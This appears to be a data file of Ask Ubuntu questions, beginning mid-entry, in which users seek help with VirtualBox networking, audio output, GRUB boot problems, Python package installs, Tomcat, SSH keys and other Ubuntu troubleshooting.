window , as so often happens a list of lines of text too numerous to count or to note down appeared , but it seemed that my package lists were restored or rebuilt . i closed the terminal window , then found my access to ubuntu software centre has been restored ! i hope this has fixed my update and upgrade problems , but either way i 'll let you know asap .
426868	ubuntu virtualbox vm unable to connect to internet in office environment	i have gone through a lot of links available on internet to fix the issue of ubuntu vm unable to access internet , but i found no solution . i use this laptop in my office ( not from home ) . it could be specific to my environment , therefore i am creating this question here . following are the details . problem statement : 1 ) ubuntu vm is unable to connect to internet . ( eg . can’t connect to www.google.com ) 2 ) ubuntu vm is able to connect to host and thus able to browse web sites internal to the company . i have the following software on my office laptop . 1 ) os windows 7 professional . ( host ) 2 ) oracle virtualbox version 4.3.2 . 3 ) ubuntu 12.04 desktop lts virtual machine ( guest ) the virtualbox network setup for ubuntu vm is as below : adapter 1 attached to : “nat” name : no name advanced adapter type : intel pro/1000 mt desktop ( 82540em ) promiscuous mode : allow vms mca address : 080027e2e304 cable connected is ticked there is no port forwarding adapter 2 attached to : host-only adapter name : virtualbox host-only ethernet adapter advanced adapter type : intel pro/1000 mt desktop ( 82540em ) promiscuous mode : allow vms mca address : 080027b5740b cable connected is ticked there is no port forwarding the guest is able to ping host and host is also able to ping guest . this could be the reason why guest is able to only access internal web sites . the main problem is guest is not able to browse web sites external to the office , i.e it can not connect to internet . following is the ifconfig output from ubuntu . eth0 link encap : ethernet hwaddr 08:00:27 : e2 : e3:04 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fee2 : e304/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:99 errors:0 dropped:0 overruns:0 frame:0 tx packets:291 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17115 ( 17.1 kb ) tx bytes:33151 ( 33.1 kb ) eth1 link encap : ethernet hwaddr 08:00:27 : b5:74:0b inet addr:192.168.56.101 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : feb5:740b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10 errors:0 dropped:0 overruns:0 frame:0 tx packets:65 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3848 ( 3.8 kb ) tx bytes:11496 ( 11.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:119 errors:0 dropped:0 overruns:0 frame:0 tx packets:119 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15122 ( 15.1 kb ) tx bytes:15122 ( 15.1 kb )
426869	running spotify via wine will only use speakers not play via headphones	i have spotify installed under wine . it currently is trying to use my desktop speakers as the default output device , however i have changed the system settings to use all input and output sound for my headset . i also configured wine settings to use my g930 headset for the default audio device . now when i play for example youtube video 's it plays great through my headset . but only spotify installed via wine is determined to use only my desktop speakers . any ideas and thanks to all .
426871	grub 2 prompt after kubuntu 13.10 installtion attempt	i tried to install kubuntu 13.10 on my lenovo yoga 2 pro tonight . i took the following steps -- created a live usb -- booted the live usb with efi ( without disabling 'secureboot ' or 'lenovo fast boot ' at this point ) -- chose 'try kubuntu' -- chose the standard installation to install kubuntu alongside windows 8.1 ( i resized /dev/part5 during the kubuntu installation to be half for windows and half for kubuntu ) now after finishing the installation i rebooted , which brought me to the grub 2 terminal . when i type 'exit ' i end up in a 'boot manager ' which allows me to choose between 'kubuntu ' and 'windows boot manager ' . if i select 'windows boot manager ' everything works fine and i can run win 8.1 without any problems . however , if i select 'kubuntu ' i end up again in the grub 2 terminal ( although i would have to type 'exit ' twice then to get back to the 'boot manager ' ) . also tried to disable 'secure boot ' and 'lenovo fast boot ' subsequent to the installation -- the same problem remains . any thoughts how to fix this ? do i just need to run bootrepair from live usb ? thank you for you help !
426876	value too large for defined data type	i need to burn a iso ( 3.3gb in size ) using brasero using my ubuntu machine , however when i try to do it which the iso is saved in my portable usb drive with ntfs file system , ubuntu 64-bit says : value too large for defined data type is there a work around for this , so i can burn iso into disk ? $ uname -a linux ubuntu-desktop 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux and i tried to create a large file : username : ~/temp $ dd if=/dev/zero of=file bs=1048576 count=51205120+0 records in 5120+0 records out 5368709120 bytes ( 5.4 gb ) copied , 92.9742 s , 57.7 mb/s
426880	why is / taking up 7 gb of space ( running du )	so i am new to ubuntu and linux in general . i am trying to determing what is taking so much disk space so i run the following command . du / -h -d 2 | sort -hr which outputs the following 7.3g / 5.1g /var 3.8g /var/www 1.1g /usr 635m /var/lib 573m /var/cache 570m /lib 474m /lib/modules 354m /usr/share 308m /usr/src 262m /usr/lib 135m /usr/bin 118m /var/log what does the first line of output mean ? why or how could / ( nothing ? ) be taking up 7gb of space ?
426885	swift backend for openstack services	how to set the swift back-end storage for the open-stack glance service thanks in advance i used open-stack havana-relase
426891	close lightdm and return to prompt ( ubuntu 12.04 )	my server is configured with ubuntu server 12.04 and lubuntu minimal . i have grub set to show only text upon boot . when i must use the vnc i either use my vps 's recovery vnc or i enable the vnc server it via ssh and invoke sudo service lightdm start inside the vnc session what i 'd like to be able to do is close lightdm and return to terminal without rebooting ( hopefully freeing up all resources that the gui used ) . if i invoke sudo service lightdm stop vnc is left with no prompt . searching about pointed me to close lightdm in ubuntu 12.02 with the comment : it seems to me that for some reason you stay at the active virtual console 7 after stopping lightdm . try switching to vc-1 , login then stop lightdm . the magical accord is ctrl-alt-f1 . which may infact work , but i ca n't test it because my macbookpro does n't seem to send the fkeys to the vnc client . ideally i 'd prefer a script i can run to properly close out the session and return to the prompt . any thoughts ?
426893	simultaneous output of audio to digital and analogue on 13.10	this used to work , using pulse audio i can see the option in the sounds settings to have simultaneous output but it does n't seem to work . if i have analogue selected then click on simultaneous , i still hear the sound on analogue but nothing on the digital channel and the same for digital . i did a pacmd list-sinks got this : welcome to pulseaudio ! use `` help '' for usage information . 2 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.iec958-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl decibel_volume latency dynamic_latency state : running suspend cause : priority : 9958 volume : 0 : 42 % 1 : 42 % 0 : -22.72 db 1 : -22.72 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 89.89 ms max request : 15 kib max rewind : 64 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 1 linked by : 1 configured latency : 90.00 ms ; range is 0.50 .. 371.52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc889 digital '' alsa.id = `` alc889 digital '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 1 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xfbff8000 irq 44 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1c20 '' device.product.name = `` 6 series/c200 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` iec958:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` iec958-stereo '' device.profile.description = `` digital stereo ( iec958 ) '' device.description = `` built-in audio digital stereo ( iec958 ) '' alsa.mixer_name = `` realtek alc889 '' alsa.components = `` hda:10ec0889,1458a002,00100004 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : iec958-stereo-output : digital output ( s/pdif ) ( priority 0 , latency offset 0 usec , available : unknown ) properties : active port : < iec958-stereo-output > index : 1 name : < combined > driver : < module-combine-sink.c > flags : decibel_volume latency state : suspended suspend cause : idle priority : 1000 volume : 0 : 54 % 1 : 54 % 0 : -15.83 db 1 : -15.83 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max request : 34 kib max rewind : 0 kib monitor source : 2 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 fixed latency : 200.00 ms module : 10 properties : device.class = `` filter '' device.description = `` simultaneous output to built-in audio digital stereo ( iec958 ) '' device.icon_name = `` audio-card '' i do n't know if this helps
426896	uninstall the preinstalled pil	i would like to install pillow , but according to the pillow 's documentation , i must remove pil first , which seems to have come preinstalled in ubuntu 13.10 . what 's the best way to do that ?
426897	how do i know the system call for a particular command ?	i 'm new in ubuntu and i have this question about strace ls command . when i 'm run this command it gives all the system calls . what if i need to know the system calls for a specific command , for example if i run the command mkdir ? i want to know what are the system calls for this particular command . its helps me a lot in my studies . thank a lot .
426899	unmount partition from script , but keep desktop icon ?	i dual boot xubuntu 12.04 with windows 8 . i have a couple of games installed on the windows side that also work well under wine . i have a script that checks to see if the windows partition is mounted and , if necessary , mount it with udisks . then it runs the game . then , if the script mounted the partition , unmount it . is there a way to do this that wo n't cause the desktop icon for the partition to disappear ? right clicking the file system 's icon and choosing eject unmounts the partition but the icon remains . running the script unmounts the partition , but the icon disappears . # ! /bin/sh mounted=0 if [ ! -d /media/os ] ; then udisks -- mount /dev/sda2 mounted=1 fi cd /media/os/ '' program files ( x86 ) '' /steam/steamapps/common/ss2/ wine shock2.exe if [ `` $ mounted '' = `` 1 '' ] ; then cd /media udisks -- unmount /dev/sda2 fi i need to run the script as a non-root user and without creating an entry in /etc/fstab , which is why i use udisks instead of mount .
426904	no such file or directory : '/usr/lib/python2.7/sitecustomize.py ' but it is there in red color	while trying to install denyhosts but i am getting this error : ioerror : [ errno 2 ] no such file or directory : '/usr/lib/python2.7/sitecustomize.py' i verified that /usr/lib/python2.7/sitecustomize.py does exist . as you can also see in below screenshot however that appears in red color ( do n't know if it is a signaling something ) .
426905	how to have degrees celsius in conky ?	i have a very simple conky script with the relevant line being : ram : $ memperc % cpu : $ cpu % $ { time % a , % d % b } $ { time % h : % m } c : $ { acpitemp } but i want to put the little degree sign before `` c '' in c : $ { acpitemp } . how do i do that ? also , can i have the cpu and rma to read with two digits ? so when the usage is below 10 % it would look like 09 % and not just 9 % .
426906	can not mount a hard drive	i have a second hard drive that has a partition for /home mounted on the first drive . yesterday , the booting failed because /home can not be found . i run 'blkid ' and see its uuid is gone . but when i run 'fdisk -l ' i can see the drive . i tried to manually mount it but it would n't recognize any the filesystem type . and 'dmesg|tail ' showed ca n't find ext3/ext4 and etc . i also run 'file -ls /dev/sda1 ' and it gives '/dev/sda1 : data ' . is there a way that i can access the drive or just copy the data off the drive ? thanks .
426910	how to install games ( .sh and .bin games )	i recently purchased the humble bundle but i am having trouble installing the games and getting them to run . some of them are .sh and others are .bin files . on a terminal , i have cd to the location where i downloaded them to and typed chmod +x * so i can apply it to the games that i downloaded . after that i type sudo ./gamefile.sh for the game that is a .sh file . and when i try to run them i get error saying that a file is not found in the game directory but i see it there and even checked the permissions . another game that is a .sh file as well , runs and loads but then it just sends me to straight to the desktop . i do n't know if its relevant but i am running the latest ubuntu version on a chromebook . thanks . so after trying all of the suggestions , i failed to notice an error reported by the terminal while it was installing . `verifying archive integrity ... all good . uncompressing mojo setup ... ... ... ... .. collecting info for this system ... operating system : linux cpu arch : x86_64 trying mojosetup in bin/linux/x86_64 ( mojosetup:12936 ) : ibus-warning ** : the owner of /home/user/.config/ibus/bus is not root ! `
426914	mount bluetooth usb in virtualbox	i originally asked this question here python module pybluez error and have narrowed it down to basically i ca n't get vbox to recognize my bluetooth usb . i 'm on a mac os x 10.9.2 . i 've installed virtualbox as well as the extension pack and i 've installed ubuntu desktop 10.04.4 on the virtualbox . i 've searched several mac forums and this seems to be a common problem w/o a clear solution . anyways , the question is how can i get virtualbox to let ubuntu recognize my bluetooth usb ? i 've checked 'enable usb 2.0 ehci controller ' and added my two bluetooth devices to the filters list . and when i click here to mount the usb i get this error message ... any ideas ? thanks , john
426915	lower right white box	in ubuntu 12.10 there is a small type box that appears in the lower right when i just start typing from the desktop . what is it ? and how am i supposed to use it ? ric
426918	setting up multiple vms on home server for remote access of vms to different users via internet	i have a home server ( 2.3ghz - 6core , 16gb ram , 3tb hdd , etc . ) with ubuntu server running on it . i want to install 3 different vms on it ( all ubuntu ) for 3 different people . each person will access an individual vm ( assigned to him/her ) over the internet . i want the user to access only the vm and not the host server . the host server should be accessible only to me . upon doing google search for it , i found that it can be done with rdp . but i wan na know the details of how to do it and set it up ( tutorials , courses or online resources ) . along with it , i want to know that if i setup rdp for each vm , should the vms be running all the time on the server for remote access ? is there a way to start the vm upon getting access request from the user for their particular vm ? can i do this with ubuntu 13.10 openstack havana installation ?
426920	problem installing pillow for python 3 ( importerror : can not import name _imaging )	i attempted to install pillow for python 3 using the following method . installation made sure i had the proper dependencies listed in pillow 's docs : sudo apt-get install python3-dev python3-setuptools sudo apt-get install libtiff4-dev libjpeg8-dev zlib1g-dev \ libfreetype6-dev liblcms2-dev libwebp-dev tcl8.5-dev tk8.5-dev downloaded the latest pillow git clone https : //github.com/python-imaging/pillow.git installed using checkinstall , cd ~/pillow sudo checkinstall python3 setup.py install it seemed to have installed correctly problem i started python 3 , and entered from pil import image , but i get the error traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` ./pil/image.py '' , line 53 , in < module > from pil import _imaging as core importerror : can not import name _imaging any ideas ?
426924	action on unlock/login	i need to run custom command on every login and unlock screen ( e.g . user did n't logged out but lock screen ) . do you have any ideas how i can implement it ? i 'm using ubuntu 13.10 .
426925	will ubuntu 13.10 work with the capacitive touch functions in hp elitebook revolve 810 ?	i have a hp elitebook revolve 810 p/n d3k50ut # aba with 10 finger capacitive touch functions , auto-rotate and many other features . will ubuntu 13.10 work with these functions ?
426931	disable console access ?	how do i disable console access to ubuntu 12.04 ? i want to only allow login over ssh . i have searched the web thoroughly but no clear answer was found . edit : i 'm talking about disabling physical console access .
426932	dual boot , fan overheating & battery issues with ubuntu 13.10	i have a hp pavilion g6 2201ax laptop which came with windows 8 preloaded . i wish to use a linux system on it and i have installed ubuntu 13.10 . i have found after installing ubuntu that i have encountered 3 problems . dual booting problem when i installed ubuntu and restarted my laptop , it booted into the win 8 os . now every time i boot my system it boots by default into windows 8 . i have found that if i want to boot into ubuntu then i have to go into bios and have to select the required drive . overheating problem this is seriously the worst problem of the 2 i have to face ; when i boot ubuntu , my laptop fanspeed increases and is constantly on . as a result of this in a few minutes ( 10-15 minutes ) my system tends to become overheated . battery also if i plug out my ac adaptor and use it with my default battery then my system only lasts for 30 minutes while in windows it lasts for around 3 hours . how can i fix these three problems ?
426933	live cd ubuntu 13.10 is not working with hp printer 1020 plus	i am new to linux . we have new requirement where in i have to connect hp 1020 plus printer with ubuntu live cd . i have tried a lot but unable to do . when we are installing new hplib from site i is working but in live cd we are unable to do that so please give solution .
426936	what file types does kdiff3-qt compare ?	i 've tried to compare .odt and .doc files in kdiff3-qt and all i get is gobbledygook . the only files i 've been able to compare are .html . does anybody know the file types that kdifff3-qt will compare ? and if it 's very limited , is there a better comparison tool ( for xubuntu 10:13 ) that i can get ?
426937	why mplayer can open a rtmp video but can not download it ?	when i open a rtmp movie with mplayer i can see the streaming but when i try to download it mplayer says '' error : closing connection : netstream.play.streamnotfound '' anyone knows something about ? i am runnning ubuntu precise
426939	error when installing ubuntu	i 've tried to google for it but i could n't find a solution . i have windows on my disk and i 'm trying to install ubuntu with dualboot but when i install ubuntu on ssd or hdd i get this error : the creation of swap space in partition # 1 of encrypted volume0 ( cryptswap1 ) failed i choose install ubuntu alongside windows and than i could use the default option with my hdd and an option to create a new partition on my ssd â both fails .
426941	skipping to search results fails in evince	with the new version of evince ( 3.10 ) i noticed that skimming through search results fails quite often . while evince finds matches for search queries just fine ( displayed in the left bar ) , as you try to skip to the next one by repeatedly pressing `` enter '' , at some point it stops advancing to the next match , as if there are no other matches to go to , but if you look in the left bar- there clearly are . sometimes it gets stuck in the current page results , sometimes pressing `` enter '' just sends you back to the first result . is there a fix or some way to downgrade ?
426943	404 in tomcat7 after installed	after tomcat is installed and startup.sh is run , $ sudo ./bin/startup.sh using catalina_base : /home/cathay/work/apache-tomcat-7.0.42 using catalina_home : /home/cathay/work/apache-tomcat-7.0.42 using catalina_tmpdir : /home/cathay/work/apache-tomcat-7.0.42/temp using jre_home : /home/cathay/work/jdk1.6.0_45 using classpath : /home/cathay/work/apache-tomcat-7.0.42/bin/bootstrap.jar : /home/cathay/work/apache-tomcat-7.0.42/bin/tomcat-juli.jar the localhost:8888 shows a blank page ( not 404 ) . but the localhost_access_log.2014-02-26.txt shows the following information , 127.0.0.1 - - [ 26/feb/2014:18:49:52 +0800 ] `` get / http/1.1 '' 404 - [ other information ] the relevant content of server.xml is as followed , connector port= '' 8888 '' protocol= '' http/1.1 '' connectiontimeout= '' 20000 '' redirectport= '' 8443 '' connector executor= '' tomcatthreadpool '' port= '' 8888 '' protocol= '' http/1.1 '' connectiontimeout= '' 20000 '' redirectport= '' 8443 '' connector port= '' 8009 '' protocol= '' ajp/1.3 '' redirectport= '' 8443 '' and the relevant part of /etc/environment is listed below , path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/cathay/work/jdk1.6.0_45/bin '' java_home=/home/cathay/work/jdk1.6.0_45 classpath= . : /home/cathay/work/jdk1.6.0_45/lib following the /etc/profile 's , export java_home=/home/cathay/work/jdk1.6.0_45 export path= $ java_home/bin : $ path export classpath= $ classpath : $ java_home/lib export catalina_base=/home/cathay/work/apache-tomcat-7.0.42 export catalina_home= $ catalina_base export tomcat_home= $ catalina_base export classpath= $ classpath : $ java_home/lib : $ tomcat_home/lib/servlet-api.jar is the information enough to sovle the problem ? i am a new staff to tomcat , and my ubuntu version is 13.10 . i really want to know the reason causes the problem , thx .
426946	brother dcp-j140w driver in ubuntu 13.04 32 bit	i need to install my printer `` brother dcp-j140w '' driver in ubuntu 13.04 `` 32 bit '' where i can find it & how to install it
426948	how can i upgrade to ubuntu 12.04.4 lts from 12.04 lts	i just installed ubuntu 12.04 lts with an old disc and update it . how can i get the new 12.04.4 lts .
426949	serious graphic problems after upgrading from natty	i have an old toshiba portege m100 , it 's a little beater box with a broken keyboard and broken cd drive . i had natty 11.04 on it and wanted to upgrade to a currently supported version because i use this computer as a server and i was tired of not being able to upgrade software ( like php for example , causing some of my modern scripts to not work . ) i was hesitant to upgrade because i suspected this might happen ... 11.04 to 11.10 . after the upgrade i booted up and within a couple minutes the screen got all distorted and the entire system froze . i shut it down and tried running it in 2d mode , same thing . installed lubunutu , gnome fallback ... same thing . currently i can only operate the computer in console mode or openbox ( with the resolution at 800x600 ... sucks ) . since i do n't have a disc drive that works , and it seems i can not boot to usb , i do n't know how to rollback . so i ( stupidly ) upgraded again , to 12.04 precise , hoping that maybe the issue would have been fixed . well , i guess it did not make it any worse , and at least now i have access to updated repositories without having to figure out how to compile everything i need to upgrade myself . i 'm assuming that this is driver related problem . i hope my computer is not stuck this way . so my questions are ... 1 ) does this sound like a graphic driver problem ? if so , how can i roll back to whatever driver natty was using ? 2 ) if not , how do you install an os without usb or cd ? if there is no answer , then i 'll just have to get really good at navigating the command line . help ?
426952	ubuntu 12.04 network issues	i have two network devices on my virtualbox with ubuntu server 12.04 . i get this when i start up : starting configure network device [ fail ] waiting up to 60 more seconds for network configuration . i have added the second on in the : /etc/networks/interfaces and i cant find the second one in the ifconfig :
426954	sexagenarian needs direction starting to install , use and learn ubuntu	i need help and please be patient with my sexagenarian memory . i am using windows 7 on my computer and i very much want to start using ubuntu . the problem for me is that there seems to be all sorts of choices and different flavors of ubuntu that i do n't know where to begin . what i would like to do is : to ease into ubuntu by being able to somehow use window 7 and ubuntu together . over time , i hope to keep doing more and more with ubuntu , but until then , how can i best install ubuntu where i can move between windows 7 and ubuntu ? i am thinking that probably 13.10 would be the best choice for me rather than 12.04 ? is there a way i can tell if i can boot up from a usb drive on my laptop ? ? recommendations of some basic documentation on the site that will help guide me . i would like to do my learning with it in pieces . some time on a regular basis . i am not ready to reformat my drive and remove windows 7 . what do you think might be best way to install it , meaning on a usb flash drive on my laptop drive making a bootable cd/dvd thank you very much in advance for sharing your time and expertise . j temple
426956	apache ah00035 error : is it possible to place site directory on a mounted media without losing security ?	i tried to put site files on an encrypted disk that 's mounted to /media and got ( 13 ) permission denied : ah00035 : access to / denied ( filesystem path '/media/username/partition ' ) because search permissions are missing on a component of the path so i checked /media/username directories and they are drwxr-x -- - . i do n't really remember if that was my fault or is it standard behavior . is it possible to still have apache sites on a mounted media without giving every user permission to list it ?
426958	how do i propose an idea of functionality/design to ubuntu ? like in brainstorming app ?	brainstorming.ubuntu.com has been closed . my question is , if , now , i have an idea that could be implemented that i think it is wonderful , how do i propose it ?
426959	accidentally formatted partition , want to recover files	i had elementary os luna installed in my hdd , a few days before , i installed ubuntu 12.04 in another partition ( ext4 ) . i accidentally formatted the partition containing ubuntu ( to ext4 ) , i realised it instantly and unmounted the formatted drive and have n't written anything to it until now . how to get the partition back ? will my grub bootloader work ? i have ubuntu installed last , if it fails what should i do ? fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000361e8 device boot start end blocks id system /dev/sda1 921059328 976773119 27856896 83 linux /dev/sda3 * 2046 419635199 209816577 5 extended /dev/sda4 419635200 921059327 250712064 7 hpfs/ntfs/exfat /dev/sda5 251867136 252893183 513024 82 linux swap / solaris /dev/sda6 252895232 419635199 83369984 83 linux /dev/sda7 2048 125042963 62520458 83 linux /dev/sda8 125044736 251867135 63411200 83 linux sda8 is the accidentally formatted drive .
426960	booting takes time because of switching to clocksourse tsc	actually i am working on pxeboot server . while starting pxeboot client , it struck on `` switching to clocksourse tsc '' . it takes 10 to 15seconds to boot the client . actually i want to boot within a seconds . its possible means help me for this issue . thanks in advance ... .
426970	intel and amd hybrid graphic card on ubuntu 13.10 ?	it 's been a long time since i moved from ubuntu and linuxmint to archlinux and manjaro last year . but i just bought a new laptop recently and unfortunately the laptop has a muxless intel/amd hybrid graphic that does n't get mentioned in the laptop information anywhere ( shitty marketing ) . so , my main reason buying this laptop is mainly for steam gaming . and that 's why i really need this hybrid graphic working and i do n't have windows . i 've tried prime , catalyst from archlinux aur , catalyst from official amd website without success ( xorg error upon reboot ) . and i think this is due to my graphic card is too new ( amd oland sea island ) you can see my related threads here : http : //forum.manjaro.org/index.php ? topic=11068.0 then i saw this : http : //rudrageek.com/linux-now-supports-hybrid-graphics-systems-ubuntu-13-10/ so , they can get catalyst working on ubuntu 13.10 , which i ca n't get it working on manjaro . is there a chance that it will work on my laptop if i switch to ubuntu 13.10 ? i also want to know what is the current version of catalyst does ubuntu 13.10 provide in their repository ( because my card is only working on catalyst 13.12 or newer from what i see in their release note ) . i also do n't mind using open source driver , but what i saw in the ubuntu wiki said that my card ( hd8xxx oland ) is not supported yet but should be supported on ubuntu 13.10 . i want to know if there is any way to use my discrete card on steam games ( using prime or whatever which i ca n't get it working on manjaro ) . thanks before , i need some clarifications before i 'm trying to install ubuntu 13.10 and re-do those things i failed on manjaro . i want to know at least the chance of success instead of wasting my time again . hope you guys can understand . : ) this is my graphic card information : intel corporation 3rd gen core processor graphics controller ( rev 09 ) advance micro devices , inc. [ amd/ati ] mars le ( radeon hd 8530m )
426971	private/public key authentication not working after reinstalling ubuntu	i backed up my ~/.ssh folder and reinstalled ubuntu 13.10 on my machine . then i just copied the .ssh folder back into my home folder and tried to connect to my server . i 'm getting the following error : `` permission denied ( publickey ) . '' . this is my .ssh folder on the client machine : drwx -- -- -- 2 user group 4096 feb 25 21:21 . drwxr-xr-x 24 user group 4096 feb 27 10:48 .. -rw-r -- r -- 1 user group 1992 feb 4 08:08 known_hosts -rw -- -- -- - 1 user group 3326 nov 25 17:37 key -rw-r -- r -- 1 user group 747 nov 25 17:37 key.pub everything was working fine before the new installation . do i have to somehow register the private key at the client machine ? the server is a 12.04 .
426973	delted apt.conf.d folder in /etc/apt how to download it	i unfortunately deleted apt.conf.d folder in /etc/apt folder , now i am not able to download update any please provide me solution , i am using 13.10 can i copy it from my friends system using ubuntu 13.10 , or can i download any where else in web when i created an empty folder as apt.conf.d it is giving me error e : syntax error /etc/apt/apt.conf:4 : extra junk at end of file
426975	when machine encounter this message `` switching to clocksource tlc '' machine freeze	i started all the services in pxeboot server ( dhcp , tftp and nfs services ) . when i start the client machine , in the black screen some messages are running while it encounter this message `` switching to clocksource tlc '' client machine 15 to 20 seconds freeze after that client machine working fine . why it happen.. how to resolve this issue
426976	what are glib dependencies ( libs required to install glib )	can anyone inform me what are the dependencies of glib i.e that what libraries are need ( should be installed first ) in order to install glib .
426983	how can i tell if i 'm using alsa or pulse-audio by default ? ( switching to i3-wm )	i might not be understanding the core concept , in which case correct me if i 'm wrong . ubuntu comes with two different audio rendering servers , pulse and alsa . alsa is an intermediary layer to pulse ? i 'm not 100 % sure essentially i need to know which one i 'm using . the reason why i need to know ? i 'm attempting to switch from unity to i3-wm . while setting up i3 i found i had no audio and came upon this thread . it specifies various options for binding my laptop volume up and down keys to their functionality and after i tinkered with a few of the options i got very scratchy audio , which is why ( i assume ) i need to know which i 'm actually using . thanks for any help in advance , it 's much appreciated .
426990	what are the default passwords of these users : nobody , daemon , uucp , etc . ?	what are the default passwords of these users ? root daemon bin sys sync games man lp mail news uucp nobody can anyone log in through ssh or ftp as these users ?
426998	failed to get complete update in my ubuntu 12.04	this has happened quite recently . i 'm new with ubuntu , and i 'm not using dual boot so my pc only running on ubuntu . i do n't really notice what caused this . first i ca n't get complete update , it says here , some index files failed to download . they have been ignored , or old ones used instead . and then after i install handbrake using its repository , i get this when i try to update with terminal , i do n't remember but something about /etc/lock . i try to look it up but did n't dare to try the methods as they 're suggested to kill the lock . today i try to update again and i got this : w : duplicate sources.list entry http : //security.ubuntu.com/ubuntu/ precise-security/restricted i386 packages ( /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_restricted_binary-i386_packages ) so what should i do ? whenever i try to update , i get different responses ; the lock problem , fail to download some index files , and just now this . besides , a few days recently whenever i turn on my pc , the screen says can not write bytes . but then the login screen appears and i can use my pc as usual . so is it really bad if i ca n't update my pc forever ? because i can work without any problem .
427000	how can i install i3 wm on ubuntu 13.10 ?	i just followed the instructions here to install i3 on a clean installed ubuntu 13.10 on vmware fusion on os x , however after selecting the i3 session from the login screen and logging in , all i see is a black screen and i3 key bindings do n't do anything . also the instructions above installs an old version of i3 . how can i properly install the latest version of i3 ( 4.7 ) on ubuntu 13.10 ?
427002	ca n't install apache httpd after deleting original folders	i had some problems with apache , so i removed the entire folder from /etc , /var ... now the command : sudo apt-get install apache2 doesnât work , i guess because there are no apache folder anymore . so : do i have to download it ? any other solution ?
427004	nothing opens after grub menu	i have windows 7 and ubuntu 13.10 as a dual boot . i generally use ubuntu and very rarely use windows . i recently tried to open windows 7 and it entered the startup repair screen . it took too long to complete , so i restarted the pc . after restarting i chose ubuntu from the grub menu . it started , but ran too slowly and finally hung . i again restarted and thereafter it either freezes into a gray screen after choosing any entry from the grub menu or even before showing the grub menu into a black screen . nothing shows up and the screen remains constant . i looked through many questions on ask ubuntu , but none of them helped . also if the screen freezes after choosing ubuntu from grub screen , then on pressing ctrl+alt+del the computer reboots . no other key sequences work - everything remains constant . everything was fine previously and i 've not added any recent hardware so a driver problem does n't seem to be a issue . my system specs are as follow : intel core 2 duo e7300 2 gb ram seagate 250 gb hard disk intel chipset g33 graphics . please do not mark this as a duplicate as none of the other solutions in the suggested questions seemed to work .
427006	ubuntu on samsung chromebook	i 've tried to install chrubuntu on my samsung series 3 chromebook . but after following all the steps the chromebook tells me this ... [ 1659.467073 ] [ drm : find_win_disable ] *error* [ fimd : dp ] timed out waiting for vblank after disabling win : 0 after that there are some numbers followed by `` read success ! '' i hope someone can help me out with this . tom
427007	attaching 32 bit ubuntu with a 64 bit machine ?	i have installed ubuntu 12.04 lts with other software like ros and gazebo on a system with 32 bit dual core processor . but because of some problem , i have to take my hard disk and have to attach it with a system with intel xeon e5504 processor ( 64-bit processor ) . is it ok for me in future ? will it support that ? kindly reply soon ! thanks !
427010	set default resolution in lubuntu	how does one set the default resolution in lubuntu 12.04 . i set it using both arandr and the default resolution setter . both times would reset after a reboot . how do i permanently set the resolution . note : i am doing this as an unprivileged user . should i do it on my admin account ?
